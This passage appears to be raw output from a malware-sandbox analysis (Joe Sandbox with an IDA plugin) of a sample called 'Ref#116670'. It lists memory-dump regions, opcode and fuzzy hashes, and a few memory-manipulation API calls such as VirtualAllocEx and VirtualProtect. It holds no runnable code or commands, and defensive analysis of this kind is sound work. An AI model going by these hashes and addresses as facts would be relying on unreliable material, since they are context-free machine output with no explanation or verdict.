                                                                                                                                  • Instruction ID: 6e6ca0340a73ec5ad9d64dcc7dc2c18b37adaeb3efde8840ad873945d57f9ee3
                                                                                                                                  • Opcode Fuzzy Hash: eb03738a4ee2c1356eb821e3444577fef285ccb663aa5a6c56e63bcc461378b3
                                                                                                                                  • Instruction Fuzzy Hash: 3B21E5B1C002099FDB10EFAAC845AEEFBF5FF49320F548429D559A7240CB789945CFA5
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06ACD34C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271312582.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ac0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 0eafccd40e5d6c7e92085a18b5bae36c45c459cfb8b14e45e6307c2ae13a94ee
                                                                                                                                  • Instruction ID: e89ee814fa93db39f6399f6e81da45397a4219b589e26fe8ec8dccadda576b48
                                                                                                                                  • Opcode Fuzzy Hash: 0eafccd40e5d6c7e92085a18b5bae36c45c459cfb8b14e45e6307c2ae13a94ee
                                                                                                                                  • Instruction Fuzzy Hash: 901108B5D002099FCB10DFAAC844AEEFBF5FF48320F108429D419A7250C7799945CFA1
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB1F86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: e1f66ec13210d99b076a1a537037c5618cefe9f15b26aa60baebf044305f2962
                                                                                                                                  • Instruction ID: 380a229139ef1dc885fb37e1d627918204fce289f89896ebbe9f68370f813119
                                                                                                                                  • Opcode Fuzzy Hash: e1f66ec13210d99b076a1a537037c5618cefe9f15b26aa60baebf044305f2962
                                                                                                                                  • Instruction Fuzzy Hash: 8C1137B58002499FDB10DFAAC845AEEBFF5FF48310F248819E519A7250C779A940CFA0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB1F86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 24b55fce88a90c2217fddc7e508a0e12bc94728e1e9193ed6165ecfdd1e5cc37
                                                                                                                                  • Instruction ID: b2fb4a064999f77eee5b8465e06161477d8c67d17da3e159ef16af12d12f853e
                                                                                                                                  • Opcode Fuzzy Hash: 24b55fce88a90c2217fddc7e508a0e12bc94728e1e9193ed6165ecfdd1e5cc37
                                                                                                                                  • Instruction Fuzzy Hash: AB1126B69002099FDB10DFA9C9457EEBBF5FF48310F248819E519A7250C7799541CFA0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0245B6FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: 39fa059c3fd9dd26e991dea67d0caf46ab0a8e792d12ff936ec274defc0b9a4a
                                                                                                                                  • Instruction ID: 6c90b792494ec3b66364a2725b8e067729fdb8b47587d2615c5daaa66ac8cb68
                                                                                                                                  • Opcode Fuzzy Hash: 39fa059c3fd9dd26e991dea67d0caf46ab0a8e792d12ff936ec274defc0b9a4a
                                                                                                                                  • Instruction Fuzzy Hash: AE110FB5C006498FCB10DF9AC844A9EFBF4EB88324F10841AD858A7200C379A545CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: d6dc34509f659177602c0167655b8bca5aa5b4ee5b7599249015c0b322bddd50
                                                                                                                                  • Instruction ID: 544a79a91966ba190b056b8908f0c222b809292689bd365ac0b684c82b366797
                                                                                                                                  • Opcode Fuzzy Hash: d6dc34509f659177602c0167655b8bca5aa5b4ee5b7599249015c0b322bddd50
                                                                                                                                  • Instruction Fuzzy Hash: EDA1EA34A10218DFCB44EFA4D994A9DBBB2FF89310F158159E916AB365DB34EC42CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq
                                                                                                                                  • API String ID: 0-1760495472
                                                                                                                                  • Opcode ID: 1f7b66272f5e2de60942a0c642dddd62685376ab5b6f50b98995f89e267a5d8c
                                                                                                                                  • Instruction ID: 4ced82aa4d7194b4c25d57fb861794eb549bad75b01f125aa29d86b1686522af
                                                                                                                                  • Opcode Fuzzy Hash: 1f7b66272f5e2de60942a0c642dddd62685376ab5b6f50b98995f89e267a5d8c
                                                                                                                                  • Instruction Fuzzy Hash: FA71E4B4E0420C9FDB44EFA8D54469EBBB6FF89304F60C029E515AB399DB346945CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  • Opcode ID: 90674ed60a5cd3830f391d576e00c536c6454a155957ebdbf0e4f30c6a5f5e31
                                                                                                                                  • Instruction ID: ae72b88998e9c734d55757d44c980509959ac1bd309861e5744fe628ab38d1af
                                                                                                                                  • Opcode Fuzzy Hash: 90674ed60a5cd3830f391d576e00c536c6454a155957ebdbf0e4f30c6a5f5e31
                                                                                                                                  • Instruction Fuzzy Hash: 1351BF35A002568FCB11DF6DC4809AAFBF1FF8A320B158596E565DB252D730F892CBD1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: paq
                                                                                                                                  • API String ID: 0-3273118895
                                                                                                                                  • Opcode ID: e301c9ed1c5ea55f1abc31af7156b0340c087dbc9e0aa3ad51dbcdf573fd866b
                                                                                                                                  • Instruction ID: 66e1ea82a75766a4fa22384ac01628c4bb44591c76c509d68315be39cc45a70c
                                                                                                                                  • Opcode Fuzzy Hash: e301c9ed1c5ea55f1abc31af7156b0340c087dbc9e0aa3ad51dbcdf573fd866b
                                                                                                                                  • Instruction Fuzzy Hash: 93514A76600104AFCB499FA8C945D59BFF7FF8D31071A8498E2099F276DA32DC22EB51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  • Opcode ID: f9efebcb4112ac3826935488fc462f1f1312ea888e1c21e12913dcff7e3fd455
                                                                                                                                  • Instruction ID: 2c896b7109f7f0f856143309a61bef8e151d8462b51e41caf994f8bd1c5a2e43
                                                                                                                                  • Opcode Fuzzy Hash: f9efebcb4112ac3826935488fc462f1f1312ea888e1c21e12913dcff7e3fd455
                                                                                                                                  • Instruction Fuzzy Hash: 8B4126327056654FC354DBB9D840AAABBF6EFC962071944B6E658CF392CA35DC01C7A0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: p<]q
                                                                                                                                  • API String ID: 0-1327301063
                                                                                                                                  • Opcode ID: 5458a4e11409205516259f24074bfb2e44484e17bbca209d2aa4fae997d05891
                                                                                                                                  • Instruction ID: 4982faa78168f8801e0bb9e0becf930156d20d269d9475158919d11878dcfc0e
                                                                                                                                  • Opcode Fuzzy Hash: 5458a4e11409205516259f24074bfb2e44484e17bbca209d2aa4fae997d05891
                                                                                                                                  • Instruction Fuzzy Hash: 0E41AE767045509FCB52DF29C894AAA7BF6EF89350B1940A6F865CF371CA39DC41CB20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: c546081476053ae31dea79ec9911187d2bed3fce193d51415c7290a86944fa73
                                                                                                                                  • Instruction ID: efe2b589e415a29d7af1d977445b417b4ad774f2ab84248e861c0bdc135499df
                                                                                                                                  • Opcode Fuzzy Hash: c546081476053ae31dea79ec9911187d2bed3fce193d51415c7290a86944fa73
                                                                                                                                  • Instruction Fuzzy Hash: 8D41BF34D09349DFDB56CF74D8146ADBFB1AF46300F14449AE291EB2A2C7384A85CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: 725c8c30b02f2bfa1562ea804a8a3d3a1d835840062fa84704cf86bc2b4b5f2e
                                                                                                                                  • Instruction ID: 6740feb2ee8ec6b97f72e9c5a4d8ec75af05352af75bd6d7e36dcf0e668a557d
                                                                                                                                  • Opcode Fuzzy Hash: 725c8c30b02f2bfa1562ea804a8a3d3a1d835840062fa84704cf86bc2b4b5f2e
                                                                                                                                  • Instruction Fuzzy Hash: 4B317C357406009FD348EB29D954F2A77EAAFCCB14F104568E60ACB3A5CE75EC42CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: cadc34f71a78e60f090e132ab2cc9b729c9f1f1b41385716a6f0375a8d4b004f
                                                                                                                                  • Instruction ID: fc49bef403639bb893f5215a76d142682b4dac08bdc79d32f6484bdd9c9324f2
                                                                                                                                  • Opcode Fuzzy Hash: cadc34f71a78e60f090e132ab2cc9b729c9f1f1b41385716a6f0375a8d4b004f
                                                                                                                                  • Instruction Fuzzy Hash: 6A41C234A44214CFD758EBA4D998EAEBBB2FF89304F114158E5069F3A5CB75EC42CB80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: fedbede948ea2de4ee489303a1abd264bfd4f203d28590223b45c7000753f25b
                                                                                                                                  • Instruction ID: 5885bfda05f102de8b69f68b7b183663a1e08d02760e1f1172c397546b0fd720
                                                                                                                                  • Opcode Fuzzy Hash: fedbede948ea2de4ee489303a1abd264bfd4f203d28590223b45c7000753f25b
                                                                                                                                  • Instruction Fuzzy Hash: D9315B3A250510EFCB4A9F99D948C54BBB6FF8D72430A81D5F2098F636C732E861EB50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `iL
                                                                                                                                  • API String ID: 0-2296755867
                                                                                                                                  • Opcode ID: 1d769acfe009bcde5f472db7b518b588447a210a7db30f9bbe21914193a3286e
                                                                                                                                  • Instruction ID: 5307136d60505f770e08d00586d75e19fa26cba97cc649d79d193423bfb0d809
                                                                                                                                  • Opcode Fuzzy Hash: 1d769acfe009bcde5f472db7b518b588447a210a7db30f9bbe21914193a3286e
                                                                                                                                  • Instruction Fuzzy Hash: 343157B4E042088FDB44DFA9C4806AEBBB2EF89300F10C065D415AB385DB349A81CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: 848ceee294594c2ab08704d51a6f8b316de0a6b13669c18e6dbfaa22af18e862
                                                                                                                                  • Instruction ID: e157fe1b240a00eda0b5e9da09ef2bce40b8fedc8114edfe78e3843270b0e015
                                                                                                                                  • Opcode Fuzzy Hash: 848ceee294594c2ab08704d51a6f8b316de0a6b13669c18e6dbfaa22af18e862
                                                                                                                                  • Instruction Fuzzy Hash: 0031BD35B001049FCB58DFA8C954D59BBB6FF8C320B1544A9EA0ADB365DA75EC06CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `iL
                                                                                                                                  • API String ID: 0-2296755867
                                                                                                                                  • Opcode ID: 28642dc21468d6b30f907318e3fc005304826e7ab5c9a78280a471e980f7b40a
                                                                                                                                  • Instruction ID: ff247d278553e12e747d43ef9f92d1961c3b0c4c6ceed7c46f1d990cb0628cd9
                                                                                                                                  • Opcode Fuzzy Hash: 28642dc21468d6b30f907318e3fc005304826e7ab5c9a78280a471e980f7b40a
                                                                                                                                  • Instruction Fuzzy Hash: 513135B4E042098FDB44EFA9D5456EEBBB6EF89300F10C025D829BB345DB349A81CF94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                  • Opcode ID: 64a133b87f25180fb0fd1d078644c4742da8f71cf5ea0f90481fae855018c428
                                                                                                                                  • Instruction ID: 4535db23d72eec2a301195286088acade4591404dba513395d9eb89b1c4478e8
                                                                                                                                  • Opcode Fuzzy Hash: 64a133b87f25180fb0fd1d078644c4742da8f71cf5ea0f90481fae855018c428
                                                                                                                                  • Instruction Fuzzy Hash: 0D21F774A0822C8FDBA4DF24C988AD9B7B1FB49300F5184D9A90DA7780DB346EC4CF41
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06ACE32B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271312582.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ac0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 3b0ee784248bccfc8b25d7820bd7a81e74c49e45ea992b464cf775d2b2c27722
                                                                                                                                  • Instruction ID: 2fe3ab0d64a1fa93501aba285ec25242c7afbeab6f5ff0994c12f737543d19eb
                                                                                                                                  • Opcode Fuzzy Hash: 3b0ee784248bccfc8b25d7820bd7a81e74c49e45ea992b464cf775d2b2c27722
                                                                                                                                  • Instruction Fuzzy Hash: 5F1104B59002499FCB10DFAAC845AEEFFF5FF88320F248819D559A7250CB79A544CFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 3a75076f8f035656cbad8dc85b0420df5cd13e63c9549aa68726079b98cd59d1
                                                                                                                                  • Instruction ID: 491d1a27bc2d6e61e9d866d8e51fe88d96759a92ac980148308bd863e5c3b68e
                                                                                                                                  • Opcode Fuzzy Hash: 3a75076f8f035656cbad8dc85b0420df5cd13e63c9549aa68726079b98cd59d1
                                                                                                                                  • Instruction Fuzzy Hash: 87110A74A0862C8FC754DF28DA949D9BBB1FB49300F1584D9E40DA7351CB30AE84CF01
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 00c28fb032a954179c40b970cbdaa9434626bdb6623db109ce26186bae0bf2c7
                                                                                                                                  • Instruction ID: 86b0ba32de7562bb213e7acfca351d9066b558a8277c7c0a5c01847c8b169ef2
                                                                                                                                  • Opcode Fuzzy Hash: 00c28fb032a954179c40b970cbdaa9434626bdb6623db109ce26186bae0bf2c7
                                                                                                                                  • Instruction Fuzzy Hash: 3A01C4B4A0421ADFEB64DF68D584BADBBB2BB49300F5081AAD419A7B45DB305EC5CF40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 0-2366072709
                                                                                                                                  • Opcode ID: 78373671757ec4f215193d9c472701786c04071d38d86f967fdc223217572901
                                                                                                                                  • Instruction ID: b8e6f729c204f1264886ebc22df4125bc056d3354628791c11b40c70f142933d
                                                                                                                                  • Opcode Fuzzy Hash: 78373671757ec4f215193d9c472701786c04071d38d86f967fdc223217572901
                                                                                                                                  • Instruction Fuzzy Hash: 3CF06DB4909218CFEBA18F24C888BDDBBB0FF02305F1544D6C48D97252C7744A88CF26
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: y
                                                                                                                                  • API String ID: 0-4225443349
                                                                                                                                  • Opcode ID: 00492542884f1006ff6f4345ad607eab805be9628f3080c0ea0d7b89e0b4e732
                                                                                                                                  • Instruction ID: 9e4aba6dfbb2195c2b9fa8099e31298146c8176ec598277a6ef33d423a0dbbce
                                                                                                                                  • Opcode Fuzzy Hash: 00492542884f1006ff6f4345ad607eab805be9628f3080c0ea0d7b89e0b4e732
                                                                                                                                  • Instruction Fuzzy Hash: DBF0DF74D15229CFEF668F60D898BEDB7B6AB05709F10219AD509B2280C3B41A85CE91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f9817c2ac24b1c0072baf961a145d7b42677151c52ae51df474b98d1bc3065aa
                                                                                                                                  • Instruction ID: de0687c4fd501dfa8ef7dad83610a4033a6bd8ca93cf607c3c68810006800a6e
                                                                                                                                  • Opcode Fuzzy Hash: f9817c2ac24b1c0072baf961a145d7b42677151c52ae51df474b98d1bc3065aa
                                                                                                                                  • Instruction Fuzzy Hash: A9B1F474E0520CCFDB94DFA8D5456ADBBF2EB89309F208029D519EB385D7346A85CFA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: abbadc230557d2b0a87a061c203597ac7a76807201bd346492c4dad8f3d77dd5
                                                                                                                                  • Instruction ID: f222737f6e9b0378c82ff3fd8bda91912caaec0a02630f091dfaa93c91fa4e73
                                                                                                                                  • Opcode Fuzzy Hash: abbadc230557d2b0a87a061c203597ac7a76807201bd346492c4dad8f3d77dd5
                                                                                                                                  • Instruction Fuzzy Hash: 14A18C35B012049FCB55EFA8D994AADBBF2EF89311F14806AE511DB391CB36DD41CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 943eacd39af41ab6dae39b0e7285d38fddc82b03a268ccbf159355d269ce125a
                                                                                                                                  • Instruction ID: 5768479c6037456911a6f73c40b28633a75c3fa4c7c16bc89f26287f58bf3ca9
                                                                                                                                  • Opcode Fuzzy Hash: 943eacd39af41ab6dae39b0e7285d38fddc82b03a268ccbf159355d269ce125a
                                                                                                                                  • Instruction Fuzzy Hash: DF810535A01618CFCB54EF68C58499EB7F6FF48360B1681A9E9069B364DB31ED42CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 829575dc1fe5e543e76f3cad9c33e5d73ce84f141fad959c187969951e4b8881
                                                                                                                                  • Instruction ID: d2fb42150799d58bec0246e98489cea69732ad858e109daaa5e241ad530a8957
                                                                                                                                  • Opcode Fuzzy Hash: 829575dc1fe5e543e76f3cad9c33e5d73ce84f141fad959c187969951e4b8881
                                                                                                                                  • Instruction Fuzzy Hash: 177127B0E05209CFDB54CFA9E440AEEBBB2FF49304F20956AD515E7250D7709A45CFA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 884d24a18ad756d77b85a68749fe759e3df6b5db87f51230af21c885c170b539
                                                                                                                                  • Instruction ID: a3825129aa3386c1a6da4f33f8fba4c891e1655975615de3ed155fa531fd6155
                                                                                                                                  • Opcode Fuzzy Hash: 884d24a18ad756d77b85a68749fe759e3df6b5db87f51230af21c885c170b539
                                                                                                                                  • Instruction Fuzzy Hash: BF712570E05318DFEB64CF65D885BADB7F2BB4A308F1090AAD049EB251CB745985CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36b65590930538f06df10a046a51085ed2dfcbab58850118acd43247a6eaee66
                                                                                                                                  • Instruction ID: 772fee79d501144bfd9ed405ec70e1bf16ad680d5395612d69fe649cf745707b
                                                                                                                                  • Opcode Fuzzy Hash: 36b65590930538f06df10a046a51085ed2dfcbab58850118acd43247a6eaee66
                                                                                                                                  • Instruction Fuzzy Hash: CD6127B0E06209CFDB54CFA9E544AEEBBB2FF48304F10906AD515E7250D7B49945CFA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
